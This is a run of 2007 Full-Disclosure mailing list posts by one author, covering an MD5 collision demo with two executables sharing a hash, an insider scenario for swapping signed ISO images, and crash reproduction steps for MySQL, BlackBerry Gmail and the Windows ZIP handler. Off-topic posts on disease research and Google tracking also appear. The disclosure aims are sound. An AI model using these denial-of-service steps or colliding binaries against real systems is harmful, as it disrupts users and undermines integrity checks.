CloseHandle KERNEL32.dll Hello World ;-) [EMAIL PROTECTED]:/tmp$ strings GoodbyeWorld-colliding.exe | tail SetFilePointer MultiByteToWideChar LCMapStringA LCMapStringW GetStringTypeA GetStringTypeW SetStdHandle CloseHandle KERNEL32.dll Goodbye World :-( [EMAIL PROTECTED]:/tmp$ md5sum HelloWorld-colliding.exe | awk '{print $1}' | tee hw 18fcc4334f44fed60718e7dacd82dddf [EMAIL PROTECTED]:/tmp$ md5sum GoodbyeWorld-colliding.exe | awk '{print $1}' | tee gw 18fcc4334f44fed60718e7dacd82dddf [EMAIL PROTECTED]:/tmp$ cmp hw gw [EMAIL PROTECTED]:/tmp$ echo $? 0 There you have it. Surely a GPL'd tool implementing this attack style will be available shortly. And since Chinese researchers have been attacking SHA-1 lately, should SHA-256 be considered the proper replacement? I am unsure :-( -- Kristian Erik Hermansen I have no special talent. I am only passionately curious. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MD5 algorithm considered toxic (and harmful)
On Dec 1, 2007 7:08 PM, [EMAIL PROTECTED] wrote: Admittedly, MD5 is on its last legs. However, please note that the current state of the art for MD5 collisions is create two plaintexts that collide with the same (but unpredictable) MD5 hash. That's what these binaries demonstrate. Correct... What is still *not* known to be doable is given a plaintext that has a pre-specified MD5 hash, compute a second plaintext with the same hash. So publishing the MD5 hash of the binary is still safe - for now. But is it? Let's create a thought experiment. Let us first assume that an internal security product release engineer has access to the source code, the product binaries, and is responsible for creating ISO images and MD5 hashes to accompany them for distribution to government agencies which will utilize the security product internally. OK, now let's say that this release engineer wants to create two different ISO images, each with a different AUTORUN feature on the disc. Since he has the ability to choose the hash here, then we must therefore conclude that MD5 will not actually ensure that the disc is legitimate and unaltered. Now, such an attack is not as sexy as colliding with a pre-formed MD5 hash, but we do know that approximately 70% of exploited security issues somehow involve internal personnel. If I was a vendor, I'd be publishing both MD5 and SHA-256 for the data. So my question to you then is why even bother with MD5, and not just choose to use SHA-256 instead? In fact, I might even go so far to say that future Linux distributions should stop including the md5sum program in default installations. I say this because it correlates with the secure by default motto. If the user really needs md5sum, they can install it separately. The only issue is that both applications are included in coreutils, so it is unlikely that they would ever be separated. (Note that strictly speaking, what you *really* want is a PGP-signed or otherwise authenticated MD5/SHA-256 hash. Otherwise, if I'm an attacker, I can just splat a new binary up, and a new MD5SUMS file that lists the MD5 sum for the backdoored binaries. If anything, more people manage to screw *this* part up than the much lesser offense of still using MD5 rather than something from the SHA-2 family) Yeah, storing your MD5 and binary on the same asset is just like keeping your important security logs on a system that was just compromised. Your data is tainted... -- Kristian Erik Hermansen I have no special talent. I am only passionately curious. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MySQL 5.x DoS (unknown)
My roommate Joe Gallo found this one today while tediously laboring away at blinkx (video search engine), but I think it is funny, and could be used to crash local/remote databases due to an assertion in MySQL that fails and results in SIGABRT/signal-6 to occur on non-indexed tables...have phun :-) http://bugs.mysql.com/bug.php?id=32125 -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Gmail 1.1.0 for BlackBerry remote DoS
I have tested and confirmed this bug on a BlackBerry 8700c in a repeatable fashion. Three outcomes are common (so may be race condition)... 1) Entire BlackBerry OS freeze. (On soft-reboot, you will see the uncaught Java exception for Gmail app) 2) Gmail freezes for some time, and then OS can recover (Gmail not responding, and killed) 3) Or no DoS at all (if you are lucky) Here is the message you will get... Uncaught exception: Application gm_8700_v4_0_L1(147) is not responding; process terminated The way I have commonly invoked this is to send an email of at least 20k in size to Exchange-synced email address on the same device. If the user has Gmail account open, it is more likely to go into DoS condition if you are composing an email or replying to a large thread. Maybe this is due to Gmail trying to auto-save the draft at the same time and hanging? Also, how is the hacker community debugging BlackBerry apps for security issues? ie, can I remotely debug the processes via USB on the 8700c? Thanks in advance... PS -- Oh, I just thought that since we are talking about BlackBerry, I should mention another funny bug, but not a security issue. It has to do with multi-byte character manipulation... Tested on 8700c v4.2.1.96 (Platform 2.3.0.79). Follow these steps to reproduce the Arabic array index out of bounds exception when making a phone call... Home - Settings - Options - Language - Change Option - Arabic (funky chars, top item in list) - Save Home - [do this next part quickly] tap 9, tap 0 quickly twice, while char is still highlighted tap DEL. Uncaught exception: java.lang.StringIndexOutOfBoundsException -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Microsoft Windows default ZIP handler bug
I tested this on three Windows XP machines and was able to make them all crash. There is an issue with the way Microsoft's default compressed file handler deals with embedded compressed files. I don't have much time to investigate further, since I am in Atlanta all this week for SPICON and don't have any tools on my corp laptop :-( However, I put together a Flash video showing the bug. It may not be exploitable, but I also haven't been keeping up with the latest bad pointer / alternate code path research stuff. Maybe someone can do some ninjitsu code exec using this... Video: http://kristian-hermansen.com/hacks/microsoft-windows-default-compressed-file-handler-crasher-2.swf File: http://kristian-hermansen.com/hacks/.zip -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows default ZIP handler bug
On 10/15/07, 3APA3A [EMAIL PROTECTED] wrote: Can not reproduce it on patched Windows XP. May be it's DynaZIP library buffer overflows fixed with MS04-34. I think it should work. Try this and let me know if the ZIP handler crashes... * Open .zip * Then the .zip embedded within * Click the UP-DIRECTORY button * Crash ... It may be possible to exploit this without any user interaction, for instance, while extraction is occurring. Or, it may also be possible to integrate a path similar to the '..' tar traversal that was published recently. I have no idea. If you find that it does crash on your latest updated XP, let us know... -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] extension for Firefox to force HTTPS always?
So one example is that you are in a wifi cafe and you want to browse sites which may be available on both http and https. One example is when you browse google calendar. By default you will get http even after logging in over https. It doesn't really matter anyways and I should just code this up for myself. I was just wondering if something already existed...that whole code reuse concept...you know :-/ On 10/12/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Fri, 12 Oct 2007 15:06:14 PDT, Kristian Erik Hermansen said: I just wanted to clarify that I am looking for an extension that will rewrite all encountered HTTP references in Firefox to HTTPS. I would already have a firewall or some other layer7 filtering device blocking unencrypted traffic. The addon Better Gmail does something similar to this, with the force HTTPS option, but not exactly... What should this hypothetical extension do if it automagically redirects http: to https:, but the target server is something that is only listening on port 80 because it doesn't have https: enabled? https://www.cnn.com just sorta sits there for me. -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] extension for Firefox to force HTTPS always?
Sometimes when pen-testing you don't want to leak any unencrypted data. Is there a Firefox extension that forces all content over HTTPS to ensure such security? -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] extension for Firefox to force HTTPS always?
I just wanted to clarify that I am looking for an extension that will rewrite all encountered HTTP references in Firefox to HTTPS. I would already have a firewall or some other layer7 filtering device blocking unencrypted traffic. The addon Better Gmail does something similar to this, with the force HTTPS option, but not exactly... -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Core Impact 7.5 Web App pen-testing framework, as good as the hype?
Has anyone upgraded to Core Impact 7.5 and utilized the web application pen-testing framework? And if so, do you have any thoughts on it? Good? Bad? Evil? Not worth the hype? Etc? Any other vendors do it better? Have any issues with large sites? What makes it so special? Any input is appreciated. If you have questions about CI 7.x itself, I can give you some info from my experience with the product over the past three years as well if you would like to take the discussion offline and not flood this list... -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Dailydave] Hacking software is lame -- try medical research...
On 9/22/07, Jimby Sharp [EMAIL PROTECTED] wrote: I had a wonderful breakfast, two eggs and sandwitch. :-) I am flying to New York today. Can anyone tell me any good mall or store where I can buy a good sleeping bag? A last question, is the book Atlas Shrugged by Ayn Rand worth reading? - Jimby P.S. Well, everyone is jumping into FD to discuss their favorite topic, so i thought I might try as well. full-disclosure of your life is permitted according to the FD mailing list guidelines. Now please list your SSN, credit card numbers, last three previous addresses, and the hotel where you will be staying in New York so I can come visit you :-) -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Hacking software is lame -- try medical research...
Some interesting discussion came up on some security lists this week and it got me to thinking. Yes, hacking software is lame. Cool, so you found some vulnerabilities in some widely distributed application, service, or OS and it is patched just as quickly. Why don't we spend our time and valuable energy researching cures for rare or popular diseases instead? For instance, my brother (Jon Hermansen) has a very rare disease called Langerhans Cell Histiocytosis. It is also better known as LCH. It can be identified as causing such further diseases as Diabetes Insipidus, which is also uncommon (not sugar diabetes). Have you heard of these diseases before? Let me educate you… General Information: http://en.wikipedia.org/wiki/Langerhans_cell_histiocytosis http://en.wikipedia.org/wiki/Diabetes_insipidus Seven Part Video Series: http://youtube.com/watch?v=KkBRqZS8nfM http://youtube.com/watch?v=w1h6ZjxF-To http://youtube.com/watch?v=0ojbJpERlt8 http://youtube.com/watch?v=dzUqdYofMCQ http://youtube.com/watch?v=lNhzwNYhi0M http://youtube.com/watch?v=nY9DDEhShcE http://youtube.com/watch?v=5_8SEYyEZGI And even worse than this, a friend of mine who is a PhD student in Math at Berkeley has an even rarer disease known as Gaucher's Disease. This costs $550,000 / year to treat. That's a hefty bill every year (you make that much doing security vulns?), and some insurance companies might refuse to accept you due to pre-existing conditions. So guess what, my friend does not have health insurance and has not been treated for two years. A genius might die. That's ludicrous. http://en.wikipedia.org/wiki/Gaucher's_disease http://youtube.com/watch?v=0nX6QM5iVaU If we consider ourselves decent hackers, why don't we put our efforts toward helping cure this and other diseases rather than some very simple programming vulnerability? Is it because then we would have to reinvent a whole new slew of tools and re-orient/re-educate ourselves to be successful? Think about it… -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Dailydave] Hacking software is lame -- try medical research...
On 9/21/07, Curt [EMAIL PROTECTED] wrote: I notice that you didn't mention any rare disease that none of your friends or relatives have. Why is it that all of these altruistic people seem to never give a crap until it happens to them? Did Michael J Fox give one thin dime to Parkinsons until he had it? How about Christopher Reeves and spinal injury/stem cell? I'd much rather make my money, and donate to non-profit orgs that do things that I am interested in. You make some great points -- but I think you jumped the gun on assuming I am evil. Friends and people who know me understand that I am active in many circles, offering help to those in need. I highly encourage you to do the same so that we can live in a world where people are friendlier and healthier. The world is what we make of it, and I always disliked the hostility in the security and free software communities. Everyone should be nicer to each other and not bash people when they ask simple questions, even if they haven't read the manual... -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Google Tracking
It appears to me that Google has the ability to know nearly all the sites you have visited because many larger web presences utilize Google Analytics. What this means is that Google is continually compiling data on every visitor across the Internet. If they like, they should have the ability to tie this to any Google services account you operate. Thus, perhaps they can search your Google user id and see nearly all the web sites you have ever visited across the Internet (not necessarily using their search engine, mind you). Pretty cool, or scary, depending on which side of the fence you sit. Now, correct me if I am wrong here, but I would like to hear from anyone who utilizes Google Analytics and believes this is not the case. Does the EULA suggest that Google is not tracking users across the entire Internet? Just a random though I had. Maybe this is widely known and everyone has taken proactive measures to hide this data from Google already. It is merely as simple as blocking the domain. Maybe there is a more elegant way to do it? -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DEFCON 15 and Blackhat 2007 presentations iso CDs ?
Not ISO's, but lots of good video material... http://mirrors.easynews.com/blackhat/ http://mirrors.easynews.com/defcon/ http://mirrors.easynews.com/ -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/